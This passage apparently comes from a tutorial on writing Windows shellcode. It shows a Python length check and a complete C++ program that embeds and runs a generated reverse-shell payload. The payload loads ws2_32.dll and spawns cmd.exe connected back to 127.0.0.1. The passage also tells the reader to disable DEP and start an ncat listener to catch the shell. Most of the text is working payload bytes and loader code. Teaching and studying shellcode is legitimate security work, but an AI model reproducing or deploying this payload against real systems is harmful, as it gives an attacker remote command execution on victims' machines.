"\x05\xff\x54\x24\x34\x6a\xff\xff\x74\x24\x3c\xff\x54\x24\x18\x33"
"\xff\x57\xff\xd3\x5f\x5e\x33\xc0\x5b\x8b\xe5\x5d\xc3\x33\xd2\xeb"
"\x10\xc1\xca\x0d\x3c\x61\x0f\xbe\xc0\x7c\x03\x83\xe8\x20\x03\xd0"
"\x41\x8a\x01\x84\xc0\x75\xea\x8b\xc2\xc3\x55\x8b\xec\x83\xec\x14"
"\x53\x56\x57\x89\x4d\xf4\x64\xa1\x30\x05\x05\x05\x89\x45\xfc\x8b"
"\x45\xfc\x8b\x40\x0c\x8b\x40\x14\x8b\xf8\x89\x45\xec\x8d\x47\xf8"
"\x8b\x3f\x8b\x70\x18\x85\xf6\x74\x4f\x8b\x46\x3c\x8b\x5c\x30\x78"
"\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8\x9e\xff\xff\xff\x8b"
"\x4c\x33\x20\x89\x45\xf8\x03\xce\x33\xc0\x89\x4d\xf0\x89\x45\xfc"
"\x39\x44\x33\x18\x76\x22\x8b\x0c\x81\x03\xce\xe8\x7d\xff\xff\xff"
"\x03\x45\xf8\x39\x45\xf4\x74\x1e\x8b\x45\xfc\x8b\x4d\xf0\x40\x89"
"\x45\xfc\x3b\x44\x33\x18\x72\xde\x3b\x7d\xec\x75\xa0\x33\xc0\x5f"
"\x5e\x5b\x8b\xe5\x5d\xc3\x8b\x4d\xfc\x8b\x44\x33\x24\x8d\x04\x48"
"\x0f\xb7\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04\x30\x03\xc6"
"\xeb\xdd\x2f\x05\x05\x05\xf2\x05\x05\x05\x80\x01\x05\x05\x77\x73"
"\x32\x5f\x33\x32\x2e\x64\x6c\x6c\x05\x63\x6d\x64\x2e\x65\x78\x65"
"\x05\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x05";
```

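The part about relocations is the important one, because it lets you check that everything is OK. For example, we know that our reverse shell uses 3 strings, and the output confirms that all three were extracted from the `.rdata` section. We can also see that the original `shellcode` was 614 bytes, while the generated `shellcode` (after handling the relocations and the `null` bytes) is 715 bytes.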
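As a sanity check on the final length, the first bytes of the generated shellcode can be decoded by hand. The sketch below is my own reading of those bytes, not part of `sce.py`: it assumes that `B9 imm32` at offset 7 is the `MOV ECX`, that `81 F1 imm32` at offset 12 is the `XOR ECX`, and that `83 C7 imm8` at offset 18 is the `ADD EDI` applied to the return address of the 5-byte `CALL`.

```python
import struct

# First 21 bytes of the generated shellcode shown in the output above.
stub = bytes.fromhex("e8ffffffffc05fb9a803010181f10101010183c71d")

# Assumed instruction layout (see the lead-in); fail loudly if it does not match.
assert stub[7] == 0xB9 and stub[12:14] == b"\x81\xf1" and stub[18:20] == b"\x83\xc7"

(mov_imm,) = struct.unpack_from("<I", stub, 8)    # operand of MOV ECX
(xor_imm,) = struct.unpack_from("<I", stub, 14)   # operand of XOR ECX

encoded_len = mov_imm ^ xor_imm   # value left in ECX: bytes still to decode
decoder_len = 5 + stub[20]        # return address of the CALL + ADD EDI operand
print(encoded_len, decoder_len, decoder_len + encoded_len)
```

The two immediates are free of null bytes, yet their XOR gives a length of 681. Adding the 34 bytes of the decoder yields 715, the final length reported by the script.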

Now we need to run the generated `shellcode`. Here is the complete source code:

```
#include <cstring>
#include <cassert>

// Important: Disable DEP!
//  (Linker->Advanced->Data Execution Prevention = NO)

int main() {
    char shellcode[] =
        "\xe8\xff\xff\xff\xff\xc0\x5f\xb9\xa8\x03\x01\x01\x81\xf1\x01\x01"
        "\x01\x01\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x05\x0f\x44\xc6\xaa"
        "\xe2\xf6\xe8\x05\x05\x05\x05\x5e\x8b\xfe\x81\xc6\x7b\x02\x05\x05"
        "\xb9\x03\x05\x05\x05\xfc\xad\x01\x3c\x07\xe2\xfa\x55\x8b\xec\x83"
        "\xe4\xf8\x81\xec\x24\x02\x05\x05\x53\x56\x57\xb9\x8d\x10\xb7\xf8"
        "\xe8\xa5\x01\x05\x05\x68\x87\x02\x05\x05\xff\xd0\xb9\x40\xd5\xdc"
        "\x2d\xe8\x94\x01\x05\x05\xb9\x6f\xf1\xd4\x9f\x8b\xf0\xe8\x88\x01"
        "\x05\x05\xb9\x82\xa1\x0d\xa5\x8b\xf8\xe8\x7c\x01\x05\x05\xb9\x70"
        "\xbe\x1c\x23\x89\x44\x24\x18\xe8\x6e\x01\x05\x05\xb9\xd1\xfe\x73"
        "\x1b\x89\x44\x24\x0c\xe8\x60\x01\x05\x05\xb9\xe2\xfa\x1b\x01\xe8"
        "\x56\x01\x05\x05\xb9\xc9\x53\x29\xdc\x89\x44\x24\x20\xe8\x48\x01"
        "\x05\x05\xb9\x6e\x85\x1c\x5c\x89\x44\x24\x1c\xe8\x3a\x01\x05\x05"
        "\xb9\xe0\x53\x31\x4b\x89\x44\x24\x24\xe8\x2c\x01\x05\x05\xb9\x98"
        "\x94\x8e\xca\x8b\xd8\xe8\x20\x01\x05\x05\x89\x44\x24\x10\x8d\x84"
        "\x24\xa0\x05\x05\x05\x50\x68\x02\x02\x05\x05\xff\xd6\x33\xc9\x85"
        "\xc0\x0f\x85\xd8\x05\x05\x05\x51\x51\x51\x6a\x06\x6a\x01\x6a\x02"
        "\x58\x50\xff\xd7\x8b\xf0\x33\xff\x83\xfe\xff\x0f\x84\xc0\x05\x05"
        "\x05\x8d\x44\x24\x14\x50\x57\x57\x68\x9a\x02\x05\x05\xff\x54\x24"
        "\x2c\x85\xc0\x0f\x85\xa8\x05\x05\x05\x6a\x02\x57\x57\x6a\x10\x8d"
        "\x44\x24\x58\x50\x8b\x44\x24\x28\xff\x70\x10\xff\x70\x18\xff\x54"
        "\x24\x40\x6a\x02\x58\x66\x89\x44\x24\x28\xb8\x05\x7b\x05\x05\x66"
        "\x89\x44\x24\x2a\x8d\x44\x24\x48\x50\xff\x54\x24\x24\x57\x57\x57"
        "\x57\x89\x44\x24\x3c\x8d\x44\x24\x38\x6a\x10\x50\x56\xff\x54\x24"
        "\x34\x85\xc0\x75\x5c\x6a\x44\x5f\x8b\xcf\x8d\x44\x24\x58\x33\xd2"
        "\x88\x10\x40\x49\x75\xfa\x8d\x44\x24\x38\x89\x7c\x24\x58\x50\x8d"
        "\x44\x24\x5c\xc7\x84\x24\x88\x05\x05\x05\x05\x01\x05\x05\x50\x52"
        "\x52\x52\x6a\x01\x52\x52\x68\x92\x02\x05\x05\x52\x89\xb4\x24\xc0"
        "\x05\x05\x05\x89\xb4\x24\xbc\x05\x05\x05\x89\xb4\x24\xb8\x05\x05"
        "\x05\xff\x54\x24\x34\x6a\xff\xff\x74\x24\x3c\xff\x54\x24\x18\x33"
        "\xff\x57\xff\xd3\x5f\x5e\x33\xc0\x5b\x8b\xe5\x5d\xc3\x33\xd2\xeb"
        "\x10\xc1\xca\x0d\x3c\x61\x0f\xbe\xc0\x7c\x03\x83\xe8\x20\x03\xd0"
        "\x41\x8a\x01\x84\xc0\x75\xea\x8b\xc2\xc3\x55\x8b\xec\x83\xec\x14"
        "\x53\x56\x57\x89\x4d\xf4\x64\xa1\x30\x05\x05\x05\x89\x45\xfc\x8b"
        "\x45\xfc\x8b\x40\x0c\x8b\x40\x14\x8b\xf8\x89\x45\xec\x8d\x47\xf8"
        "\x8b\x3f\x8b\x70\x18\x85\xf6\x74\x4f\x8b\x46\x3c\x8b\x5c\x30\x78"
        "\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8\x9e\xff\xff\xff\x8b"
        "\x4c\x33\x20\x89\x45\xf8\x03\xce\x33\xc0\x89\x4d\xf0\x89\x45\xfc"
        "\x39\x44\x33\x18\x76\x22\x8b\x0c\x81\x03\xce\xe8\x7d\xff\xff\xff"
        "\x03\x45\xf8\x39\x45\xf4\x74\x1e\x8b\x45\xfc\x8b\x4d\xf0\x40\x89"
        "\x45\xfc\x3b\x44\x33\x18\x72\xde\x3b\x7d\xec\x75\xa0\x33\xc0\x5f"
        "\x5e\x5b\x8b\xe5\x5d\xc3\x8b\x4d\xfc\x8b\x44\x33\x24\x8d\x04\x48"
        "\x0f\xb7\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04\x30\x03\xc6"
        "\xeb\xdd\x2f\x05\x05\x05\xf2\x05\x05\x05\x80\x01\x05\x05\x77\x73"
        "\x32\x5f\x33\x32\x2e\x64\x6c\x6c\x05\x63\x6d\x64\x2e\x65\x78\x65"
        "\x05\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x05";

    static_assert(sizeof(shellcode) > 4, "Use 'char shellcode[] = ...' (not 'char *shellcode = ...')");

    // We copy the shellcode to the heap so that it's in writeable memory and can modify itself.
    char *ptr = new char[sizeof(shellcode)];
    memcpy(ptr, shellcode, sizeof(shellcode));
    ((void(*)())ptr)();
}
```

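To make this code work, you need to disable DEP (`Data Execution Prevention`): go to `Project→Properties`, then under `Configuration Properties`, `Linker`, `Advanced`, set `Data Execution Prevention (DEP)` to `No (/NXCOMPAT:NO)`. The `shellcode` is executed from the heap, which is not executable while `DEP` is enabled.

`static_assert` was introduced in `C++11` (hence the need for `VS 2013 CTP`). Here it checks that you wrote

```
char shellcode[] = "..."
```

rather than

```
char *shellcode = "..."
```

In the first case, `sizeof(shellcode)` is the actual size of the `shellcode`, and the `shellcode` is copied onto the stack. In the second case, `sizeof(shellcode)` is just the size of the pointer (i.e. 4 in a 32-bit build), and the pointer points to the `shellcode` in the `.rdata` section.

To test the `shellcode`, open a `cmd shell` and start a listener:

```
ncat -lvp 123
```

Then run the shellcode and check whether it works.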
